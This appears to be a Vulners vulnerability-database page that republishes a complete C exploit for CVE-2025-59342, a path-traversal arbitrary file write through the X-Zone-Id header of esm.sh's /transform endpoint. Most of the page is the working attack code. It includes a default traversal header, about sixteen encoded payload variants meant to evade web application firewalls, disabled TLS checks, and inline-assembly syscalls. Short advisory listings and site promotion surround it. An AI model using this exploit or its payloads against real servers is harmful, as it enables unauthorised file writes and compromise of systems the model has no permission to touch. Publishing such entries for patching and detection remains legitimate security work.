Vulners
Lucene search
esm-dev 136 - Path Traversal
| Reporter | Title | Published | Views | Family All 56 |
|---|---|---|---|---|
 | CVE-2025-59342 | 17 Sep 202517:59 | – | attackerkb |
 | Exploit for CVE-2025-59342 | 18 Sep 202522:34 | – | githubexploit |
 | CVE-2025-59342 | 17 Sep 202504:24 | – | circl |
 | esm.sh 安全漏洞 | 17 Sep 202500:00 | – | cnnvd |
 | CVE-2025-59342 | 17 Sep 202517:59 | – | cve |
 | CVE-2025-59342 esm.sh writes arbitrary files via path traversal in `X-Zone-Id` header | 17 Sep 202517:59 | – | cvelist |
 | EUVD-2025-29764 | 3 Oct 202520:07 | – | euvd |
 | esm.sh has arbitrary file write via path traversal in `X-Zone-Id` header | 17 Sep 202519:03 | – | github |
 | esm.sh <= v136 - Arbitrary File Write via Path Traversal | 3 Jun 202606:04 | – | nuclei |
 | CVE-2025-59342 | 17 Sep 202518:15 | – | nvd |
10
# Exploit Title: esm-dev 136 - Path Traversal
# Date: 2025-07-11
# Exploit Author: Byte Reaper
#Vendor Homepage: https://github.com/esm-dev/esm.sh
# Software Link: https://github.com/esm-dev/esm.sh
# CVE-2025-59342
- File : exploit.c
- Date : 09/17/2025
- Target : esm-dev
- Version: 136
- Target Endpoint : /transform
- Target Header : X-Zone-Id
- Vuln :
- Run exploit :
# gcc exploit.c argparse.c -o CVE-2025-59342 -lcurl
# ./CVE-2025-59342
#include <curl/curl.h>
#include <string.h>
#include <stdlib.h>
#include "argparse.h"
#include <time.h>
#include <unistd.h>
#include <sys/utsname.h>
#define FULL_URL 2500
#define P_Y 2000
#define POST_DATA 9000
int flagPort = 0;
int port = 80;
int selectPort = -1;
int verbose = 0;
int code = 1;
int found = 1;
int cF = 0;
int s = 0;
int bY = 0;
int sP = 0;
const char* cookies = NULL;
const char* payload = NULL;
void exit64bit()
{
int n = 0;
__asm__ volatile
(
"mov $0x4A, %%rax\n\t"
"mov $0x1, %%rdi\n\t"
"syscall\n\t"
"test %%rax, %%rax\n\t"
"jz .aD\n\t"
"mov $0x0, %[var]\n\t"
"jmp .finish\n\t"
".aD:\n\t"
"mov $0x1, %[var]\n\t"
".finish:\n\t"
: [var] "+r" (n)
:
: "rax",
"rdi"
);
if (n == 0)
{
printf("\e[0;31m[-] sys_fsync syscall Faild.\n");
fflush(stdout);
}
else if (n == 1)
{
printf("[+] sys_fsync syscall Success.\n");
}
__asm__ volatile
(
"mov $0x0, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"syscall\n\t"
:
:
: "rax",
"rdi"
);
}
struct Mem
{
char* buffer;
size_t len;
};
size_t write_cb(void* ptr, size_t size, size_t nmemb, void* userdata)
{
size_t total = size * nmemb;
struct Mem* m = (struct Mem*)userdata;
char* tmp = realloc(m->buffer, m->len + total + 1);
if (!tmp) return 0;
m->buffer = tmp;
memcpy(&(m->buffer[m->len]), ptr, total);
m->len += total;
m->buffer[m->len] = '\0';
return total;
}
int checkLen(int len, char* buf, size_t bufcap)
{
if (len < 0 || (size_t)len >= bufcap)
{
printf("\e[0;31m[-] Len is Long ! \e[0m\n");
printf("\e[0;31m[-] Len %d\e[0m\n", len);
return 1;
}
else
{
printf("\e[0;34m[+] Len Is Not Long.\e[0m\n");
return 0;
}
return 0;
}
const char* payloads[] =
{
"..//..//modules//transform//c245626ef6ca0fd9ee37759c5fac606c6ec99daa//",
"..../..../m.o.d.u.les/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/",
"..\\/..\\/modules\\/transform\\/c245626ef6ca0fd9ee37759c5fac606c6ec99daa\\/",
".//.//m?odu?le?s/tran.sfo.rm/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/",
"..%252f%252f..%252f%252fmodules%252f%252ftransform%252f%252fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%252f",
"%252e%252e%252f%252f%252e%252e%252f%252fmodules%252f%252ftransform%252f%252fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%252f",
"..%2f%2f..modules%2f%2ftransform%2f%2fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%2f",
"%2e%2e%2f%2f%2e%2emodules%2f%2ftransform%2f%2fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%2f",
"..%255c%255c..%255c%255cmodules%255c%255ctransform%255c%255cc245626ef6ca0fd9ee37759c5fac606c6ec99daa%255c%255c",
"%252e%252e%255c%255c%252e%252e%255c%255cmodules%255c%255ctransform%255c%255cc245626ef6ca0fd9ee37759c5fac606c6ec99daa%255c%255c",
"%u002e%u002e%u2215%u2215%u002e%u002e%u2215%u2215modules%u002e%u002etransform%u002e%u002ec245626ef6ca0fd9ee37759c5fac606c6ec99daa%u002e",
"%u002e%u002e%u2216%u2216%u002e%u002e%u2216%u2216modules%u2216%u2216transform%u2216%u2216c245626ef6ca0fd9ee37759c5fac606c6ec99daa%u2216",
"%e0%40%ae%e0%40%ae%e0%80%af%e0%80%af%e0%40%ae%e0%40%ae%e0%80%af%e0%80%afmodules%e0%80%af%e0%80%aftransform%e0%80%af%e0%80%afc245626ef6ca0fd9ee37759c5fac606c6ec99daa%e0%80%af",
".%00.//.%00.//modules//transform//c245626ef6ca0fd9ee37759c5fac606c6ec99daa/",
"..;//..;//modules//transform//c245626ef6ca0fd9ee37759c5fac606c6ec99daa/",
"%c0%2e%c0%2e%c0%af%c0%af%c0%2e%c0%2e%c0%af%c0%afmodules%c0%af%c0%aftransform%c0%af%c0%afc245626ef6ca0fd9ee37759c5fac606c6ec99daa%c0%af",
NULL
};
static void request(const char *baseurl)
{
CURL* curl = curl_easy_init();
const char *mes3 = "\e[0;34m[+] Create Object CURL Success.\n";
const char *mes4 = "\e[0;31m[-] Error Create Object CURL !\e[0m\n";
size_t len3 = strlen(mes3);
size_t len4 = strlen(mes4);
__asm__ volatile
(
"cmp $0x0, %[curlO]\n\t"
"je .donV\n\t"
".erD:\n\t"
"mov $0x1, %%rax\n\t"
"mov $0x1, %%rdi\n\t"
"mov %[msg], %%rsi\n\t"
"mov %[len], %%rdx\n\t"
"syscall\n\t"
"jmp .finishC\n\t"
".donV:\n\t"
"mov $0x1, %%rax\n\t"
"mov $0x1, %%rdi\n\t"
"mov %[msg1], %%rsi\n\t"
"mov %[len1], %%rdx\n\t"
"syscall\n\t"
"xor %%rdi, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"syscall\n\t"
".finishC:\n\t"
:
: [curlO] "r" (curl),
[msg] "r" ((const char *)mes3),
[len] "r" ((long)len3),
[msg1] "r" ((const char*)mes4),
[len1] "r" ((long)len4)
: "rax",
"rdi",
"rsi",
"rdx",
"rcx",
"r11",
"memory"
);
struct Mem response;
CURLcode res;
response.buffer = NULL;
response.len = 0;
const char* mes5 = "\e[0;34m[+] Buffer Clean Success.\e[0m\n";
size_t len5 = strlen(mes5);
__asm__ volatile (
"test %[buffer], %[buffer]\n\t"
"jz L_print_clean\n\t"
"L_continue:\n\t"
"jmp L_done\n\t"
"L_print_clean:\n\t"
"mov $0x1, %%rax\n\t"
"mov $0x1, %%rdi\n\t"
"movq %[msg13], %%rsi\n\t"
"mov %[len13], %%rdx\n\t"
"syscall\n\t"
"L_done:\n\t"
:
: [buffer] "r" ((const char*)response.buffer),
[msg13] "r" (mes5),
[len13] "r" (len5)
: "rax",
"rdi",
"rsi",
"rdx",
"rcx",
"r11",
"memory"
);
char full[FULL_URL];
if (flagPort != 0)
{
const char* mes8 = "\e[0;31m[-] Select Port is NULL !\e[0m\n";
size_t len8 = strlen(mes8);
__asm__ volatile (
"test %[var22], %[var22]\n\t"
"jnz L_finish\n\t"
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[msg13], %%rsi\n\t"
"mov %[len13], %%rdx\n\t"
"syscall\n\t"
"xor %%rdi, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"syscall\n\t"
"L_finish:\n\t"
:
: [var22] "r" (selectPort),
[msg13] "r" (mes8),
[len13] "r" (len8)
: "rax",
"rdi",
"rsi",
"rdx",
"rcx",
"r11",
"memory"
);
printf("\e[0;34m[+] Port Select : %d\e[0m\n",
selectPort);
int len1 = snprintf(full,
FULL_URL,
"%s:%d/transform",
baseurl,selectPort);
if (checkLen(len1,
full,
FULL_URL) == 1)
{
fprintf(stderr,
"\e[0;31m[-] Error write base url !\e[0m\n");
exit64bit();
}
printf("\e[0;34m[+] Write base URL success.\e[0m\n");
}
else if (flagPort == 0)
{
printf("\e[0;34m[+] Auto port : %d\e[0m\n", port);
int len2 = snprintf(full,
FULL_URL,
"%s:%d/transform",
baseurl,
port);
if (checkLen(len2, full, FULL_URL) == 1)
{
fprintf(stderr,
"\e[0;31m[-] Error write base url !\e[0m\n");
exit64bit();
}
printf("\e[0;34m[+] Write base URL success.\e[0m\n");
}
printf("[+] Base URL : %s\n", baseurl);
printf("[+] Result full url : %s\n", full);
char post[POST_DATA];
int len9 = snprintf(post, POST_DATA, "{\"filename\":\"cve.js\",\"lang\":\"js\",\"code\":\"console.log('Exploit!');\",\"importMap\":{\"imports\":{\"react\":\"https://esm.sh/react\",\"react-dom\":\"https://esm.sh/react-dom\"}},\"jsxImportSource\":\"react\",\"target\":\"es2022\",\"sourceMap\":\"external\",\"minify\":true}");
if (checkLen(len9, post, POST_DATA) == 1)
{
fprintf(stderr,
"[-] Error write post data !\e[0m\n");
exit64bit();
}
printf("\e[0;34m[+] Write Post data Success.\e[0m\n");
printf("\e[0;35m[+] Post data :===================================\e[0m\n");
printf("%s\n", post);
printf("\e[0;32m[+] Size : %d\e[0m\n", POST_DATA);
printf("\e[0;32m[+] Len : %zu\e[0m\n", strlen(post));
printf("\e[0;35m==================================================\e[0m\n");
curl_easy_setopt(curl,
CURLOPT_URL,
full);
curl_easy_setopt(curl,
CURLOPT_ACCEPT_ENCODING,
"");
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
if (cF)
{
curl_easy_setopt(curl,
CURLOPT_COOKIEFILE,
cookies);
curl_easy_setopt(curl,
CURLOPT_COOKIEJAR,
cookies);
}
curl_easy_setopt(curl,
CURLOPT_POST,
1L);
curl_easy_setopt(curl,
CURLOPT_POSTFIELDS,
post);
curl_easy_setopt(curl,
CURLOPT_POSTFIELDSIZE,
(long)strlen(post));
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&response);
curl_easy_setopt(curl,
CURLOPT_CONNECTTIMEOUT,
5L);
struct timespec rqtp, rmtp;
rqtp.tv_sec = 1;
rqtp.tv_nsec = 500000000;
register long r10R asm("r10");
r10R = 0;
printf("\e[0;33m[+] Sleep (%ld seconds) && (%ld nanoseconds)...\e[0m\n",
rqtp.tv_sec, rqtp.tv_nsec);
int ret;
__asm__ volatile
(
"syscall"
: "=a"(ret)
: "a"(0xE6),
"D"((long)0),
"S"((long)0),
"d"(&rqtp),
"r"(r10R)
: "rcx",
"r11",
"memory"
);
curl_easy_setopt(curl,
CURLOPT_TIMEOUT,
10L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYHOST,
0L);
struct curl_slist* headers = NULL;
headers = curl_slist_append(headers,
"User-Agent: Den/8.7.1");
headers = curl_slist_append(headers,
"Accept: */*");
headers = curl_slist_append(headers,
"Connection: keep-alive");
headers = curl_slist_append(headers,
"Content-Type: application/json");
headers = curl_slist_append(headers,
"Referer: http://localhost:9999/");
if (s!=0)
{
printf("[+] Your Payload : %s\n", payload);
printf("\e[0;33m[+] Checking payload...\n");
if (strstr(payload, "../") || strstr(payload, "..\\"))
{
printf("\e[0;36m[+] Detected path traversal \"../\" in payload.\n");
}
else
{
printf("\e[0;31m[-] No path traversal detected. Please provide a valid payload.\n");
exit64bit();
}
if (strstr(payload, "/transform"))
{
printf("\e[0;36m[+] Detected endpoint '/transform' in payload.\n");
}
else
{
printf("\e[0;31m[-] Endpoint '/transform' not detected in payload!\n");
exit64bit();;
}
}
else
{
headers = curl_slist_append(headers,
"X-Zone-Id: ../../modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/"); //auto payload
printf("[+] Auto payload ../../modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/.\n");
}
curl_easy_setopt(curl,
CURLOPT_HTTPHEADER,
headers);
if (verbose)
{
curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);
}
res = curl_easy_perform(curl);
curl_slist_free_all(headers);
if (res == CURLE_OK)
{
printf("\e[1;36m[+] Request sent successfully\e[0m\n");
long httpcode;
double timeT;
double timeR;
char* urlD = NULL;
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&httpcode);
curl_easy_getinfo(curl,
CURLINFO_TOTAL_TIME,
&timeT);
curl_easy_getinfo(curl,
CURLINFO_REDIRECT_TIME,
&timeR);
curl_easy_getinfo(curl,
CURLINFO_REDIRECT_URL,
&urlD);
printf("\e[0;32m[+] Delayed response : %f\e[0m\n", timeT);
printf("\e[0;34m[+] TIME REDIRECT: %.1f\e[0m\n", timeR);
if (urlD == NULL)
{
printf("\e[0;36m[+] Not REDIRECT Found.\e[0m\n");
}
else
{
printf("\e[0;34m[+] REDIRECT To : %s\e[0m\n", urlD);
}
printf("\e[0;32m[+] HTTP CODE : %ld\n", httpcode);
if (response.buffer != NULL)
{
printf("\e[0;35m=============================================== [RESPONSE] ===============================================\e[0m\n");
printf("%s\n", response.buffer);
printf("\e[0;32m[+] Size Pointer response : %d\e[0m\n", sizeof(response.buffer));
printf("\e[0;32m[+] Len : %zu\e[0m\n", response.len);
printf("\e[0;35m==========================================================================================================\e[0m\n");
}
else
{
printf("\e[0;31m[-] Error show buffer : NULL response !\n");
__asm__ volatile
(
"mov $0x0, %%rdi\n\t"
"mov $0xE7, %%rax\n\t"
"syscall\n\t"
:
:
:"rax",
"rdi"
);
}
printf("===========================================================================================================\n");
if (httpcode >= 200 && httpcode < 300)
{
const char* words[] =
{
"Exploit!",
"cve.js",
"mjs",
"console",
"code",
"map",
"AAAA",
"IAAI",
"names",
NULL
};
printf("\e[0;32m[+] Http code (200 - 300)\e[0m\n");
printf("\e[0;33m[+] Check Word in response...\e[0m\n");
for (int u = 0; words[u] != NULL; u++)
{
code = 1;
if (strstr(response.buffer, words[u]) != NULL)
{
printf("[+] Word found in response : %s\n",
words[u]);
__asm__ volatile
(
"mov $0x0, %[var12]\n\t"
: [var12] "=r" (found)
:
:
);
break;
}
}
if (found == 0)
{
printf("\e[0;36m[+] Words were found in the server's response, indicating that the exploitation was likely successful.\e[0m\n");
}
const char *mes11 = "\e[0;31m[-] Not found words in response !\e[0m\n";
size_t len11 = strlen(mes11);
__asm__ volatile
(
"test %[var11], %[var11]\n"
"jnz notZero\n\t"
"jmp finish11\n\t"
"notZero:\n\t"
"mov $0x1, %%rax\n\t"
"mov $0x1, %%rdi\n\t"
"movq %[size11], %%rsi\n\t"
"mov %[len11], %%rdx\n\t"
"syscall\n\t"
"finish11:\n\t"
:
: [var11] "r" ((int)found),
[size11] "r" ((const char *)mes11),
[len11] "r" (len11)
:"rax",
"rdi",
"rsi",
"rdx",
"r11",
"rcx",
"memory"
);
}
else
{
printf("\e[0;31m[-] Http code Not range (200 - 300)\e[0m\n");
printf("\e[0;31m[-] Please check url and port.\e[0m\n");
}
printf("\e[0;35m[+] Result Exploit :\e[0m\n");
if (code == 1 && found == 0)
{
printf("\e[0;36m[+] HTTP code positive and expected word found: Exploit succeeded (CVE-2025-59342).\e[0m\n");
}
else if (code == 1 && found != 0)
{
printf("\e[0;36m[+] HTTP code positive but expected word not found: Partial success (CVE-2025-59342).\e[0m\n");
}
else if (code != 1 && found == 0)
{
printf("\e[0;31m[-] HTTP code negative but word found: Unexpected result (CVE-2025-59342).\e[0m\n");
}
else
{
printf("\e[0;31m[-] Exploitation did not succeed.\e[0m\n");
}
}
else
{
printf("\e[0;31m[-] Error Send Request !\e[0m\n");
printf("\e[0;31m[-] Error : %s\n", curl_easy_strerror(res));
exit64bit();
}
curl_easy_cleanup(curl);
free(response.buffer);
}
void bypass(const char* urlB)
{
struct Mem responseBypass;
responseBypass.buffer = NULL;
responseBypass.len = 0;
const char* mes14 = "\e[0;34m[+] Buffer Clean Success.\e[0m\n";
size_t len14 = strlen(mes14);
__asm__ volatile (
"test %[buffer1], %[buffer1]\n\t"
"jz L_print_clean1\n\t"
"L_continue1:\n\t"
"jmp L_done1\n\t"
"L_print_clean1:\n\t"
"mov $0x1, %%rax\n\t"
"mov $0x1, %%rdi\n\t"
"movq %[msg14], %%rsi\n\t"
"mov %[len14], %%rdx\n\t"
"syscall\n\t"
"L_done1:\n\t"
:
: [buffer1] "r" ((const char*)responseBypass.buffer),
[msg14] "r" (mes14),
[len14] "r" (len14)
: "rax",
"rdi",
"rsi",
"rdx",
"rcx",
"r11",
"memory"
);
CURL* curl = curl_easy_init();
if (curl == NULL)
{
fprintf(stderr,"[-] Error Create Object CURL !\n");
exit64bit();
}
CURLcode res1;
char postData[POST_DATA];
int len15 = snprintf(postData,
POST_DATA,
"{\"filename\":\"cve.js\",\"lang\":\"js\",\"code\":\"console.log('Exploit!');\",\"importMap\":{\"imports\":{\"react\":\"https://esm.sh/react\",\"react-dom\":\"https://esm.sh/react-dom\"}},\"jsxImportSource\":\"react\",\"target\":\"es2022\",\"sourceMap\":\"external\",\"minify\":true}");
if (checkLen(len15,
postData,
POST_DATA) == 1)
{
fprintf(stderr,
"[-] Error write post data !\e[0m\n");
exit64bit();
}
if (curl)
{
for (int i = 0; payloads[i] != NULL; i++)
{
struct curl_slist* h = NULL;
char fullURL[FULL_URL];
snprintf(fullURL,
FULL_URL,
"%s/transform",
urlB);
char hLine[1024];
snprintf(hLine,
1024,
"X-Zone-Id: %s",
payloads[i]);
h = curl_slist_append(h, hLine);
h = curl_slist_append(h,
"User-Agent: Den/8.7.1");
h = curl_slist_append(h,
"Content-Type: application/json");
curl_easy_setopt(curl,
CURLOPT_URL,
fullURL);
curl_easy_setopt(curl,
CURLOPT_HTTPHEADER,
h);
if (cF)
{
curl_easy_setopt(curl,
CURLOPT_COOKIEFILE,
cookies);
curl_easy_setopt(curl,
CURLOPT_COOKIEJAR,
cookies);
}
curl_easy_setopt(curl,
CURLOPT_POSTFIELDS,
postData);
curl_easy_setopt(curl,
CURLOPT_POSTFIELDSIZE,
(long)strlen(postData));
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&responseBypass);
struct timespec rqtp, rmtp;
rqtp.tv_sec = 1;
rqtp.tv_nsec = 500000000;
register long r10R asm("r10");
r10R = 0;
printf("\e[0;33m[+] Sleep (%ld seconds) && (%ld nanoseconds)...\e[0m\n",
rqtp.tv_sec, rqtp.tv_nsec);
int ret;
__asm__ volatile
(
"syscall"
: "=a"(ret)
: "a"(0xE6),
"D"((long)0),
"S"((long)0),
"d"(&rqtp),
"r"(r10R)
: "rcx",
"r11",
"memory"
);
curl_easy_setopt(curl,
CURLOPT_TIMEOUT,
10L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYHOST,
0L);
res1 = curl_easy_perform(curl);
curl_slist_free_all(h);
if (res1 == CURLE_OK)
{
long httpC;
printf("---------------------------------------------------------------------------------------------------\n");
printf("\e[1;36m[+] Request sent successfully\e[0m\n");
printf("[+] Payload Test : %s\n", payloads[i]);
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&httpC);
printf("[+] Http code : %ld\n",
httpC);
if (responseBypass.buffer != NULL)
{
printf("\e[0;35m=============================================== [RESPONSE] ===============================================\e[0m\n");
printf("%s\n", responseBypass.buffer);
printf("\e[0;35m==========================================================================================================\e[0m\n");
if (httpC == 501 || strstr(responseBypass.buffer,
"Unsupported method") != NULL)
{
printf("[-] Please check target URL, The server does not support the POST request.\n");
}
else
{
__asm__ volatile("nop");
}
}
else
{
printf("[-] Response NULL !\n");
exit64bit();
}
if (httpC >= 200 && httpC < 300)
{
if (code == 0)
{
printf("[+] Bypass Waf Success.\n");
}
else
{
printf("[-] The server's response is still negative !\n");
}
if (responseBypass.buffer != NULL)
{
printf("\e[0;35m=============================================== [RESPONSE] ===============================================\e[0m\n");
printf("%s\n", responseBypass.buffer);
printf("%zu\n", responseBypass.len);
printf("\e[0;35m==========================================================================================================\e[0m\n");
free(responseBypass.buffer);
responseBypass.buffer = NULL;
responseBypass.len = 0;
}
else
{
printf("[-] Response NULL (Bypass WAF) !\n");
exit64bit();
}
}
else
{
printf("[-] Http code Not 200-300 !\n");
printf("[+] Waf detect OR check input base url / port.\n");
}
}
}
}
else
{
printf("[-] Error Send Request !\n");
}
curl_easy_cleanup(curl);
}
int main(int argc,
const char** argv)
{
printf("\e[1;37m+-----------------------+\e[0m\n");
printf("\e[1;37m| Author : Byte Reaper |\e[0m\n");
printf("\e[1;37m| CVE : CVE-2025-59342 |\e[0m\n");
printf("\e[1;37m| Vuln : Path Traversal |\e[0m\n");
printf("\e[1;37m+-----------------------+\e[0m\n");
printf("\e[1;30m------------------------------------------------------------------------\e[0m\n");
printf("[+] Check Your os...\n");
struct utsname os;
__asm__ volatile
(
"mov %0, %%rdi\n\t"
"mov $0x3F, %%rax\n\t"
"syscall\n\t"
:
: "r"(&os)
: "rax",
"rdi"
);
printf("\e[0;36m[+] System Name: %s\e[0m\n", os.sysname);
printf("\e[0;36m[+] Machine : %s\e[0m\n", os.machine);
if (strstr(os.sysname, "Linux") != NULL)
{
printf("\e[0;36m[+] Linux OS, Check Machine architecture...\e[0m\n");
}
else
{
printf("[-] OS Not Linux 64 bit (%s),Exit...\e[0m\n", os.sysname);
printf("[+] Please RUN exploit in linux.\n");
exit64bit();
}
if (strstr(os.machine, "x86_64") != NULL)
{
printf("\e[0;36m[+] Machine architecture is 64 bit, run exploit...\e[0m\n");
}
else
{
printf("[-] OS Not architecture 64 bit (%s), Exit...\e[0m\n", os.machine);
exit64bit();
}
const char* url = NULL;
struct argparse_option options[] =
{
OPT_HELP(),
OPT_STRING('u',
"url",
&url,
"Enter Target URL."),
OPT_INTEGER('p',
"port",
&selectPort,
"Enter Target PORT."),
OPT_BOOLEAN('v',
"verbose",
&verbose,
"Verbose Mode."),
OPT_STRING('c',
"cookies",
&cookies,
"Enter File cookies."),
OPT_STRING('k',
"payload",
&payload,
"Enter Payload."),
OPT_BOOLEAN('b',
"bypass",
&sP,
"Arg Bypass WAF."),
OPT_END()
};
struct argparse argparse;
argparse_init(&argparse,
options,
NULL,
0);
argparse_parse(&argparse,
argc,
argv);
if (!url)
{
printf("\e[0;31m[-] Please Enter Target IP OR URl !\e[0m\n");
printf("\e[0;31m[!] Exemple : ./CVE-2025-59342 -u http://TARGET\e[0m\n");
__asm__ volatile
(
"xor %%rdi, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"1:\n\t"
"syscall\n\t"
:
:
: "rax",
"rdi",
"rsi"
);
}
if (verbose)
{
__asm__ volatile
(
"add $0x1, %[var6]\n\t"
: [var6] "+r" (verbose)
:
:
);
}
else
{
__asm__ volatile
(
"mov $0x0, %[var7]\n\t"
: [var7] "=r" (verbose)
:
:
);
}
flagPort = (selectPort != -1);
if (payload != NULL)
{
s = 1;
}
else
{
s = 0;
}
if (sP)
{
bypass(url);
}
else
{
request(url);
}
printf("\e[0;36m[+] Finish Script.\n");
__asm__ volatile
("mov $0x3C, %%rax\n\t"
"mov $0x0, %%rdi\n\t"
"syscall\n\t"
:
:
:"rax", "rdi"
);
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Dec 2025 00:00Current
7High risk
Vulners AI Score7
CVSS 46.9
EPSS0.06448
SSVC